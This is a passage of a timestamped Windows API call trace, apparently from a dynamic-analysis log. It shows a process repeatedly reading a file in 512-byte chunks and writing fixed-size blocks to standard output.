lpBuffer=0x2aebac*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2adcf0, lpOverlapped=0x0 | out: lpBuffer=0x2aebac*, lpNumberOfBytesWritten=0x2adcf0*=0x50, lpOverlapped=0x0) returned 1 [0223.436] _get_osfhandle (_FileHandle=1) returned 0x50 [0223.436] GetFileType (hFile=0x50) returned 0x1 [0223.436] _get_osfhandle (_FileHandle=1) returned 0x50 [0223.436] WriteFile (in: hFile=0x50, lpBuffer=0x2aebfc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2adcf0, lpOverlapped=0x0 | out: lpBuffer=0x2aebfc*, lpNumberOfBytesWritten=0x2adcf0*=0x50, lpOverlapped=0x0) returned 1 [0223.437] _get_osfhandle (_FileHandle=1) returned 0x50 [0223.437] GetFileType (hFile=0x50) returned 0x1 [0223.438] _get_osfhandle (_FileHandle=1) returned 0x50 [0223.438] WriteFile (in: hFile=0x50, lpBuffer=0x2aec4c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2adcf0, lpOverlapped=0x0 | out: lpBuffer=0x2aec4c*, lpNumberOfBytesWritten=0x2adcf0*=0x50, lpOverlapped=0x0) returned 1 [0223.438] _get_osfhandle (_FileHandle=1) returned 0x50 [0223.438] GetFileType (hFile=0x50) returned 0x1 [0223.438] _get_osfhandle (_FileHandle=1) returned 0x50 [0223.438] WriteFile (in: hFile=0x50, lpBuffer=0x2aec9c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2adcf0, lpOverlapped=0x0 | out: lpBuffer=0x2aec9c*, lpNumberOfBytesWritten=0x2adcf0*=0x50, lpOverlapped=0x0) returned 1 [0223.438] _get_osfhandle (_FileHandle=1) returned 0x50 [0223.438] GetFileType (hFile=0x50) returned 0x1 [0223.438] _get_osfhandle (_FileHandle=1) returned 0x50 [0223.438] WriteFile (in: hFile=0x50, lpBuffer=0x2aecec*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x2adcf0, lpOverlapped=0x0 | out: lpBuffer=0x2aecec*, lpNumberOfBytesWritten=0x2adcf0*=0x20, lpOverlapped=0x0) returned 1 [0223.438] _get_osfhandle (_FileHandle=4) returned 0x58 [0223.438] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2adcdc | out: lpNewFilePointer=0x0) returned 1 [0223.438] _get_osfhandle 
(_FileHandle=4) returned 0x58 [0223.438] ReadFile (in: hFile=0x58, lpBuffer=0x2aeb0c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2adcfc, lpOverlapped=0x0 | out: lpBuffer=0x2aeb0c*, lpNumberOfBytesRead=0x2adcfc*=0x200, lpOverlapped=0x0) returned 1 [0223.438] _get_osfhandle (_FileHandle=1) returned 0x50 [0223.438] GetFileType (hFile=0x50) returned 0x1 [0223.438] _get_osfhandle (_FileHandle=1) returned 0x50 [0223.438] GetFileType (hFile=0x50) returned 0x1 [0223.438] _get_osfhandle (_FileHandle=1) returned 0x50 [0223.438] WriteFile (in: hFile=0x50, lpBuffer=0x2aeb0c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2adcf0, lpOverlapped=0x0 | out: lpBuffer=0x2aeb0c*, lpNumberOfBytesWritten=0x2adcf0*=0x50, lpOverlapped=0x0) returned 1 [0223.439] _get_osfhandle (_FileHandle=1) returned 0x50 [0223.439] GetFileType (hFile=0x50) returned 0x1 [0223.439] _get_osfhandle (_FileHandle=1) returned 0x50 [0223.439] WriteFile (in: hFile=0x50, lpBuffer=0x2aeb5c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2adcf0, lpOverlapped=0x0 | out: lpBuffer=0x2aeb5c*, lpNumberOfBytesWritten=0x2adcf0*=0x50, lpOverlapped=0x0) returned 1 [0223.439] _get_osfhandle (_FileHandle=1) returned 0x50 [0223.439] GetFileType (hFile=0x50) returned 0x1 [0223.439] _get_osfhandle (_FileHandle=1) returned 0x50 [0223.439] WriteFile (in: hFile=0x50, lpBuffer=0x2aebac*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2adcf0, lpOverlapped=0x0 | out: lpBuffer=0x2aebac*, lpNumberOfBytesWritten=0x2adcf0*=0x50, lpOverlapped=0x0) returned 1 [0223.439] _get_osfhandle (_FileHandle=1) returned 0x50 [0223.439] GetFileType (hFile=0x50) returned 0x1 [0223.439] _get_osfhandle (_FileHandle=1) returned 0x50 [0223.439] WriteFile (in: hFile=0x50, lpBuffer=0x2aebfc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2adcf0, lpOverlapped=0x0 | out: lpBuffer=0x2aebfc*, lpNumberOfBytesWritten=0x2adcf0*=0x50, lpOverlapped=0x0) returned 1 [0223.439] _get_osfhandle (_FileHandle=1) returned 0x50 [0223.439] 
GetFileType (hFile=0x50) returned 0x1 [0223.439] _get_osfhandle (_FileHandle=1) returned 0x50 [0223.439] WriteFile (in: hFile=0x50, lpBuffer=0x2aec4c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2adcf0, lpOverlapped=0x0 | out: lpBuffer=0x2aec4c*, lpNumberOfBytesWritten=0x2adcf0*=0x50, lpOverlapped=0x0) returned 1 [0223.439] _get_osfhandle (_FileHandle=1) returned 0x50 [0223.439] GetFileType (hFile=0x50) returned 0x1 [0223.439] _get_osfhandle (_FileHandle=1) returned 0x50 [0223.439] WriteFile (in: hFile=0x50, lpBuffer=0x2aec9c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2adcf0, lpOverlapped=0x0 | out: lpBuffer=0x2aec9c*, lpNumberOfBytesWritten=0x2adcf0*=0x50, lpOverlapped=0x0) returned 1 [0223.440] _get_osfhandle (_FileHandle=1) returned 0x50 [0223.440] GetFileType (hFile=0x50) returned 0x1 [0223.440] _get_osfhandle (_FileHandle=1) returned 0x50 [0223.440] WriteFile (in: hFile=0x50, lpBuffer=0x2aecec*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x2adcf0, lpOverlapped=0x0 | out: lpBuffer=0x2aecec*, lpNumberOfBytesWritten=0x2adcf0*=0x20, lpOverlapped=0x0) returned 1 [0223.440] _get_osfhandle (_FileHandle=4) returned 0x58 [0223.440] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2adcdc | out: lpNewFilePointer=0x0) returned 1 [0223.440] _get_osfhandle (_FileHandle=4) returned 0x58 [0223.440] ReadFile (in: hFile=0x58, lpBuffer=0x2aeb0c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2adcfc, lpOverlapped=0x0 | out: lpBuffer=0x2aeb0c*, lpNumberOfBytesRead=0x2adcfc*=0x200, lpOverlapped=0x0) returned 1 [0223.440] _get_osfhandle (_FileHandle=1) returned 0x50 [0223.440] GetFileType (hFile=0x50) returned 0x1 [0223.440] _get_osfhandle (_FileHandle=1) returned 0x50 [0223.440] GetFileType (hFile=0x50) returned 0x1 [0223.440] _get_osfhandle (_FileHandle=1) returned 0x50 [0223.440] WriteFile (in: hFile=0x50, lpBuffer=0x2aeb0c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2adcf0, lpOverlapped=0x0 | 
out: lpBuffer=0x2aeb0c*, lpNumberOfBytesWritten=0x2adcf0*=0x50, lpOverlapped=0x0) returned 1 [0223.440] _get_osfhandle (_FileHandle=1) returned 0x50 [0223.440] GetFileType (hFile=0x50) returned 0x1 [0223.440] _get_osfhandle (_FileHandle=1) returned 0x50 [0223.440] WriteFile (in: hFile=0x50, lpBuffer=0x2aeb5c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2adcf0, lpOverlapped=0x0 | out: lpBuffer=0x2aeb5c*, lpNumberOfBytesWritten=0x2adcf0*=0x50, lpOverlapped=0x0) returned 1 [0223.440] _get_osfhandle (_FileHandle=1) returned 0x50 [0223.440] GetFileType (hFile=0x50) returned 0x1 [0223.441] _get_osfhandle (_FileHandle=1) returned 0x50 [0223.441] WriteFile (in: hFile=0x50, lpBuffer=0x2aebac*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2adcf0, lpOverlapped=0x0 | out: lpBuffer=0x2aebac*, lpNumberOfBytesWritten=0x2adcf0*=0x50, lpOverlapped=0x0) returned 1 [0223.441] _get_osfhandle (_FileHandle=1) returned 0x50 [0223.441] GetFileType (hFile=0x50) returned 0x1 [0223.441] _get_osfhandle (_FileHandle=1) returned 0x50 [0223.441] WriteFile (in: hFile=0x50, lpBuffer=0x2aebfc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2adcf0, lpOverlapped=0x0 | out: lpBuffer=0x2aebfc*, lpNumberOfBytesWritten=0x2adcf0*=0x50, lpOverlapped=0x0) returned 1 [0223.441] _get_osfhandle (_FileHandle=1) returned 0x50 [0223.441] GetFileType (hFile=0x50) returned 0x1 [0223.441] _get_osfhandle (_FileHandle=1) returned 0x50 [0223.441] WriteFile (in: hFile=0x50, lpBuffer=0x2aec4c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2adcf0, lpOverlapped=0x0 | out: lpBuffer=0x2aec4c*, lpNumberOfBytesWritten=0x2adcf0*=0x50, lpOverlapped=0x0) returned 1 [0223.441] _get_osfhandle (_FileHandle=1) returned 0x50 [0223.441] GetFileType (hFile=0x50) returned 0x1 [0223.441] _get_osfhandle (_FileHandle=1) returned 0x50 [0223.441] WriteFile (in: hFile=0x50, lpBuffer=0x2aec9c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2adcf0, lpOverlapped=0x0 | out: lpBuffer=0x2aec9c*, 
lpNumberOfBytesWritten=0x2adcf0*=0x50, lpOverlapped=0x0) returned 1 [0223.441] _get_osfhandle (_FileHandle=1) returned 0x50 [0223.441] GetFileType (hFile=0x50) returned 0x1 [0223.441] _get_osfhandle (_FileHandle=1) returned 0x50 [0223.441] WriteFile (in: hFile=0x50, lpBuffer=0x2aecec*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x2adcf0, lpOverlapped=0x0 | out: lpBuffer=0x2aecec*, lpNumberOfBytesWritten=0x2adcf0*=0x20, lpOverlapped=0x0) returned 1 [0223.441] _get_osfhandle (_FileHandle=4) returned 0x58 [0223.441] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2adcdc | out: lpNewFilePointer=0x0) returned 1 [0223.442] _get_osfhandle (_FileHandle=4) returned 0x58 [0223.442] ReadFile (in: hFile=0x58, lpBuffer=0x2aeb0c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2adcfc, lpOverlapped=0x0 | out: lpBuffer=0x2aeb0c*, lpNumberOfBytesRead=0x2adcfc*=0x200, lpOverlapped=0x0) returned 1 [0223.442] _get_osfhandle (_FileHandle=1) returned 0x50 [0223.442] GetFileType (hFile=0x50) returned 0x1 [0223.442] _get_osfhandle (_FileHandle=1) returned 0x50 [0223.442] GetFileType (hFile=0x50) returned 0x1 [0223.442] _get_osfhandle (_FileHandle=1) returned 0x50 [0223.442] WriteFile (in: hFile=0x50, lpBuffer=0x2aeb0c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2adcf0, lpOverlapped=0x0 | out: lpBuffer=0x2aeb0c*, lpNumberOfBytesWritten=0x2adcf0*=0x50, lpOverlapped=0x0) returned 1 [0223.442] _get_osfhandle (_FileHandle=1) returned 0x50 [0223.442] GetFileType (hFile=0x50) returned 0x1 [0223.442] _get_osfhandle (_FileHandle=1) returned 0x50 [0223.442] WriteFile (in: hFile=0x50, lpBuffer=0x2aeb5c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2adcf0, lpOverlapped=0x0 | out: lpBuffer=0x2aeb5c*, lpNumberOfBytesWritten=0x2adcf0*=0x50, lpOverlapped=0x0) returned 1 [0223.442] _get_osfhandle (_FileHandle=1) returned 0x50 [0223.442] GetFileType (hFile=0x50) returned 0x1 [0223.442] _get_osfhandle (_FileHandle=1) returned 0x50 
[0223.442] WriteFile (in: hFile=0x50, lpBuffer=0x2aebac*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2adcf0, lpOverlapped=0x0 | out: lpBuffer=0x2aebac*, lpNumberOfBytesWritten=0x2adcf0*=0x50, lpOverlapped=0x0) returned 1 [0223.442] _get_osfhandle (_FileHandle=1) returned 0x50 [0223.442] GetFileType (hFile=0x50) returned 0x1 [0223.442] _get_osfhandle (_FileHandle=1) returned 0x50 [0223.442] WriteFile (in: hFile=0x50, lpBuffer=0x2aebfc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2adcf0, lpOverlapped=0x0 | out: lpBuffer=0x2aebfc*, lpNumberOfBytesWritten=0x2adcf0*=0x50, lpOverlapped=0x0) returned 1 [0223.443] _get_osfhandle (_FileHandle=1) returned 0x50 [0223.443] GetFileType (hFile=0x50) returned 0x1 [0223.443] _get_osfhandle (_FileHandle=1) returned 0x50 [0223.443] WriteFile (in: hFile=0x50, lpBuffer=0x2aec4c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2adcf0, lpOverlapped=0x0 | out: lpBuffer=0x2aec4c*, lpNumberOfBytesWritten=0x2adcf0*=0x50, lpOverlapped=0x0) returned 1 [0223.443] _get_osfhandle (_FileHandle=1) returned 0x50 [0223.443] GetFileType (hFile=0x50) returned 0x1 [0223.443] _get_osfhandle (_FileHandle=1) returned 0x50 [0223.443] WriteFile (in: hFile=0x50, lpBuffer=0x2aec9c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2adcf0, lpOverlapped=0x0 | out: lpBuffer=0x2aec9c*, lpNumberOfBytesWritten=0x2adcf0*=0x50, lpOverlapped=0x0) returned 1 [0223.443] _get_osfhandle (_FileHandle=1) returned 0x50 [0223.443] GetFileType (hFile=0x50) returned 0x1 [0223.443] _get_osfhandle (_FileHandle=1) returned 0x50 [0223.443] WriteFile (in: hFile=0x50, lpBuffer=0x2aecec*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x2adcf0, lpOverlapped=0x0 | out: lpBuffer=0x2aecec*, lpNumberOfBytesWritten=0x2adcf0*=0x20, lpOverlapped=0x0) returned 1 [0223.443] _get_osfhandle (_FileHandle=4) returned 0x58 [0223.443] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2adcdc | out: lpNewFilePointer=0x0) 
returned 1 [0223.443] _get_osfhandle (_FileHandle=4) returned 0x58 [0223.443] ReadFile (in: hFile=0x58, lpBuffer=0x2aeb0c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2adcfc, lpOverlapped=0x0 | out: lpBuffer=0x2aeb0c*, lpNumberOfBytesRead=0x2adcfc*=0x200, lpOverlapped=0x0) returned 1 [0223.443] _get_osfhandle (_FileHandle=1) returned 0x50 [0223.443] GetFileType (hFile=0x50) returned 0x1 [0223.443] _get_osfhandle (_FileHandle=1) returned 0x50 [0223.444] GetFileType (hFile=0x50) returned 0x1 [0223.444] _get_osfhandle (_FileHandle=1) returned 0x50 [0223.444] WriteFile (in: hFile=0x50, lpBuffer=0x2aeb0c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2adcf0, lpOverlapped=0x0 | out: lpBuffer=0x2aeb0c*, lpNumberOfBytesWritten=0x2adcf0*=0x50, lpOverlapped=0x0) returned 1 [0223.444] _get_osfhandle (_FileHandle=1) returned 0x50 [0223.444] GetFileType (hFile=0x50) returned 0x1 [0223.444] _get_osfhandle (_FileHandle=1) returned 0x50 [0223.444] WriteFile (in: hFile=0x50, lpBuffer=0x2aeb5c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2adcf0, lpOverlapped=0x0 | out: lpBuffer=0x2aeb5c*, lpNumberOfBytesWritten=0x2adcf0*=0x50, lpOverlapped=0x0) returned 1 [0223.444] _get_osfhandle (_FileHandle=1) returned 0x50 [0223.444] GetFileType (hFile=0x50) returned 0x1 [0223.444] _get_osfhandle (_FileHandle=1) returned 0x50 [0223.444] WriteFile (in: hFile=0x50, lpBuffer=0x2aebac*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2adcf0, lpOverlapped=0x0 | out: lpBuffer=0x2aebac*, lpNumberOfBytesWritten=0x2adcf0*=0x50, lpOverlapped=0x0) returned 1 [0223.444] _get_osfhandle (_FileHandle=1) returned 0x50 [0223.444] GetFileType (hFile=0x50) returned 0x1 [0223.444] _get_osfhandle (_FileHandle=1) returned 0x50 [0223.444] WriteFile (in: hFile=0x50, lpBuffer=0x2aebfc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2adcf0, lpOverlapped=0x0 | out: lpBuffer=0x2aebfc*, lpNumberOfBytesWritten=0x2adcf0*=0x50, lpOverlapped=0x0) returned 1 [0223.444] _get_osfhandle 
(_FileHandle=1) returned 0x50 [0223.444] GetFileType (hFile=0x50) returned 0x1 [0223.444] _get_osfhandle (_FileHandle=1) returned 0x50 [0223.444] WriteFile (in: hFile=0x50, lpBuffer=0x2aec4c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2adcf0, lpOverlapped=0x0 | out: lpBuffer=0x2aec4c*, lpNumberOfBytesWritten=0x2adcf0*=0x50, lpOverlapped=0x0) returned 1 [0223.445] _get_osfhandle (_FileHandle=1) returned 0x50 [0223.445] GetFileType (hFile=0x50) returned 0x1 [0223.445] _get_osfhandle (_FileHandle=1) returned 0x50 [0223.445] WriteFile (in: hFile=0x50, lpBuffer=0x2aec9c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2adcf0, lpOverlapped=0x0 | out: lpBuffer=0x2aec9c*, lpNumberOfBytesWritten=0x2adcf0*=0x50, lpOverlapped=0x0) returned 1 [0223.445] _get_osfhandle (_FileHandle=1) returned 0x50 [0223.445] GetFileType (hFile=0x50) returned 0x1 [0223.445] _get_osfhandle (_FileHandle=1) returned 0x50 [0223.445] WriteFile (in: hFile=0x50, lpBuffer=0x2aecec*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x2adcf0, lpOverlapped=0x0 | out: lpBuffer=0x2aecec*, lpNumberOfBytesWritten=0x2adcf0*=0x20, lpOverlapped=0x0) returned 1 [0223.445] _get_osfhandle (_FileHandle=4) returned 0x58 [0223.445] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2adcdc | out: lpNewFilePointer=0x0) returned 1 [0223.445] _get_osfhandle (_FileHandle=4) returned 0x58 [0223.445] ReadFile (in: hFile=0x58, lpBuffer=0x2aeb0c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2adcfc, lpOverlapped=0x0 | out: lpBuffer=0x2aeb0c*, lpNumberOfBytesRead=0x2adcfc*=0x200, lpOverlapped=0x0) returned 1 [0223.445] _get_osfhandle (_FileHandle=1) returned 0x50 [0223.445] GetFileType (hFile=0x50) returned 0x1 [0223.445] _get_osfhandle (_FileHandle=1) returned 0x50 [0223.445] GetFileType (hFile=0x50) returned 0x1 [0223.445] _get_osfhandle (_FileHandle=1) returned 0x50 [0223.445] WriteFile (in: hFile=0x50, lpBuffer=0x2aeb0c*, nNumberOfBytesToWrite=0x50, 
lpNumberOfBytesWritten=0x2adcf0, lpOverlapped=0x0 | out: lpBuffer=0x2aeb0c*, lpNumberOfBytesWritten=0x2adcf0*=0x50, lpOverlapped=0x0) returned 1 [0223.445] _get_osfhandle (_FileHandle=1) returned 0x50 [0223.445] GetFileType (hFile=0x50) returned 0x1 [0223.445] _get_osfhandle (_FileHandle=1) returned 0x50 [0223.445] WriteFile (in: hFile=0x50, lpBuffer=0x2aeb5c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2adcf0, lpOverlapped=0x0 | out: lpBuffer=0x2aeb5c*, lpNumberOfBytesWritten=0x2adcf0*=0x50, lpOverlapped=0x0) returned 1 [0223.446] _get_osfhandle (_FileHandle=1) returned 0x50 [0223.446] GetFileType (hFile=0x50) returned 0x1 [0223.446] _get_osfhandle (_FileHandle=1) returned 0x50 [0223.446] WriteFile (in: hFile=0x50, lpBuffer=0x2aebac*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2adcf0, lpOverlapped=0x0 | out: lpBuffer=0x2aebac*, lpNumberOfBytesWritten=0x2adcf0*=0x50, lpOverlapped=0x0) returned 1 [0223.446] _get_osfhandle (_FileHandle=1) returned 0x50 [0223.446] GetFileType (hFile=0x50) returned 0x1 [0223.446] _get_osfhandle (_FileHandle=1) returned 0x50 [0223.446] WriteFile (in: hFile=0x50, lpBuffer=0x2aebfc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2adcf0, lpOverlapped=0x0 | out: lpBuffer=0x2aebfc*, lpNumberOfBytesWritten=0x2adcf0*=0x50, lpOverlapped=0x0) returned 1 [0223.446] _get_osfhandle (_FileHandle=1) returned 0x50 [0223.446] GetFileType (hFile=0x50) returned 0x1 [0223.446] _get_osfhandle (_FileHandle=1) returned 0x50 [0223.446] WriteFile (in: hFile=0x50, lpBuffer=0x2aec4c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2adcf0, lpOverlapped=0x0 | out: lpBuffer=0x2aec4c*, lpNumberOfBytesWritten=0x2adcf0*=0x50, lpOverlapped=0x0) returned 1 [0223.446] _get_osfhandle (_FileHandle=1) returned 0x50 [0223.446] GetFileType (hFile=0x50) returned 0x1 [0223.446] _get_osfhandle (_FileHandle=1) returned 0x50 [0223.446] WriteFile (in: hFile=0x50, lpBuffer=0x2aec9c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2adcf0, 
lpOverlapped=0x0 | out: lpBuffer=0x2aec9c*, lpNumberOfBytesWritten=0x2adcf0*=0x50, lpOverlapped=0x0) returned 1 [0223.446] _get_osfhandle (_FileHandle=1) returned 0x50 [0223.446] GetFileType (hFile=0x50) returned 0x1 [0223.447] _get_osfhandle (_FileHandle=1) returned 0x50 [0223.447] WriteFile (in: hFile=0x50, lpBuffer=0x2aecec*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x2adcf0, lpOverlapped=0x0 | out: lpBuffer=0x2aecec*, lpNumberOfBytesWritten=0x2adcf0*=0x20, lpOverlapped=0x0) returned 1 [0223.447] _get_osfhandle (_FileHandle=4) returned 0x58 [0223.447] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2adcdc | out: lpNewFilePointer=0x0) returned 1 [0223.447] _get_osfhandle (_FileHandle=4) returned 0x58 [0223.447] ReadFile (in: hFile=0x58, lpBuffer=0x2aeb0c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2adcfc, lpOverlapped=0x0 | out: lpBuffer=0x2aeb0c*, lpNumberOfBytesRead=0x2adcfc*=0x200, lpOverlapped=0x0) returned 1 [0223.447] _get_osfhandle (_FileHandle=1) returned 0x50 [0223.447] GetFileType (hFile=0x50) returned 0x1 [0223.447] ReadFile (in: hFile=0x58, lpBuffer=0x2aeb0c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2adcfc, lpOverlapped=0x0 | out: lpBuffer=0x2aeb0c*, lpNumberOfBytesRead=0x2adcfc*=0x200, lpOverlapped=0x0) returned 1 [0223.447] ReadFile (in: hFile=0x58, lpBuffer=0x2aeb0c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2adcfc, lpOverlapped=0x0 | out: lpBuffer=0x2aeb0c*, lpNumberOfBytesRead=0x2adcfc*=0x200, lpOverlapped=0x0) returned 1 [0223.447] ReadFile (in: hFile=0x58, lpBuffer=0x2aeb0c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2adcfc, lpOverlapped=0x0 | out: lpBuffer=0x2aeb0c*, lpNumberOfBytesRead=0x2adcfc*=0x200, lpOverlapped=0x0) returned 1 [0223.448] ReadFile (in: hFile=0x58, lpBuffer=0x2aeb0c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2adcfc, lpOverlapped=0x0 | out: lpBuffer=0x2aeb0c*, lpNumberOfBytesRead=0x2adcfc*=0x200, lpOverlapped=0x0) returned 1 
[0223.448] ReadFile (in: hFile=0x58, lpBuffer=0x2aeb0c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2adcfc, lpOverlapped=0x0 | out: lpBuffer=0x2aeb0c*, lpNumberOfBytesRead=0x2adcfc*=0x200, lpOverlapped=0x0) returned 1 [0223.448] ReadFile (in: hFile=0x58, lpBuffer=0x2aeb0c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2adcfc, lpOverlapped=0x0 | out: lpBuffer=0x2aeb0c*, lpNumberOfBytesRead=0x2adcfc*=0x200, lpOverlapped=0x0) returned 1 [0223.448] ReadFile (in: hFile=0x58, lpBuffer=0x2aeb0c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2adcfc, lpOverlapped=0x0 | out: lpBuffer=0x2aeb0c*, lpNumberOfBytesRead=0x2adcfc*=0x200, lpOverlapped=0x0) returned 1 [0223.448] ReadFile (in: hFile=0x58, lpBuffer=0x2aeb0c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2adcfc, lpOverlapped=0x0 | out: lpBuffer=0x2aeb0c*, lpNumberOfBytesRead=0x2adcfc*=0x200, lpOverlapped=0x0) returned 1 [0223.448] ReadFile (in: hFile=0x58, lpBuffer=0x2aeb0c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2adcfc, lpOverlapped=0x0 | out: lpBuffer=0x2aeb0c*, lpNumberOfBytesRead=0x2adcfc*=0x200, lpOverlapped=0x0) returned 1 [0223.448] ReadFile (in: hFile=0x58, lpBuffer=0x2aeb0c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2adcfc, lpOverlapped=0x0 | out: lpBuffer=0x2aeb0c*, lpNumberOfBytesRead=0x2adcfc*=0x200, lpOverlapped=0x0) returned 1 [0223.448] ReadFile (in: hFile=0x58, lpBuffer=0x2aeb0c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2adcfc, lpOverlapped=0x0 | out: lpBuffer=0x2aeb0c*, lpNumberOfBytesRead=0x2adcfc*=0x200, lpOverlapped=0x0) returned 1 [0223.449] ReadFile (in: hFile=0x58, lpBuffer=0x2aeb0c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2adcfc, lpOverlapped=0x0 | out: lpBuffer=0x2aeb0c*, lpNumberOfBytesRead=0x2adcfc*=0x200, lpOverlapped=0x0) returned 1 [0223.449] ReadFile (in: hFile=0x58, lpBuffer=0x2aeb0c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2adcfc, lpOverlapped=0x0 | out: lpBuffer=0x2aeb0c*, lpNumberOfBytesRead=0x2adcfc*=0x200, 
lpOverlapped=0x0) returned 1 [0223.449] ReadFile (in: hFile=0x58, lpBuffer=0x2aeb0c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2adcfc, lpOverlapped=0x0 | out: lpBuffer=0x2aeb0c*, lpNumberOfBytesRead=0x2adcfc*=0x200, lpOverlapped=0x0) returned 1 [0223.451] ReadFile (in: hFile=0x58, lpBuffer=0x2aeb0c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2adcfc, lpOverlapped=0x0 | out: lpBuffer=0x2aeb0c*, lpNumberOfBytesRead=0x2adcfc*=0x200, lpOverlapped=0x0) returned 1 [0223.451] ReadFile (in: hFile=0x58, lpBuffer=0x2aeb0c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2adcfc, lpOverlapped=0x0 | out: lpBuffer=0x2aeb0c*, lpNumberOfBytesRead=0x2adcfc*=0x200, lpOverlapped=0x0) returned 1 [0223.451] ReadFile (in: hFile=0x58, lpBuffer=0x2aeb0c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2adcfc, lpOverlapped=0x0 | out: lpBuffer=0x2aeb0c*, lpNumberOfBytesRead=0x2adcfc*=0x200, lpOverlapped=0x0) returned 1 [0223.451] ReadFile (in: hFile=0x58, lpBuffer=0x2aeb0c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2adcfc, lpOverlapped=0x0 | out: lpBuffer=0x2aeb0c*, lpNumberOfBytesRead=0x2adcfc*=0x200, lpOverlapped=0x0) returned 1 [0223.451] ReadFile (in: hFile=0x58, lpBuffer=0x2aeb0c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2adcfc, lpOverlapped=0x0 | out: lpBuffer=0x2aeb0c*, lpNumberOfBytesRead=0x2adcfc*=0x200, lpOverlapped=0x0) returned 1 [0223.452] ReadFile (in: hFile=0x58, lpBuffer=0x2aeb0c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2adcfc, lpOverlapped=0x0 | out: lpBuffer=0x2aeb0c*, lpNumberOfBytesRead=0x2adcfc*=0x200, lpOverlapped=0x0) returned 1 [0223.452] ReadFile (in: hFile=0x58, lpBuffer=0x2aeb0c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2adcfc, lpOverlapped=0x0 | out: lpBuffer=0x2aeb0c*, lpNumberOfBytesRead=0x2adcfc*=0x200, lpOverlapped=0x0) returned 1 [0223.452] ReadFile (in: hFile=0x58, lpBuffer=0x2aeb0c, nNumberOfBytesToRead=0x200, 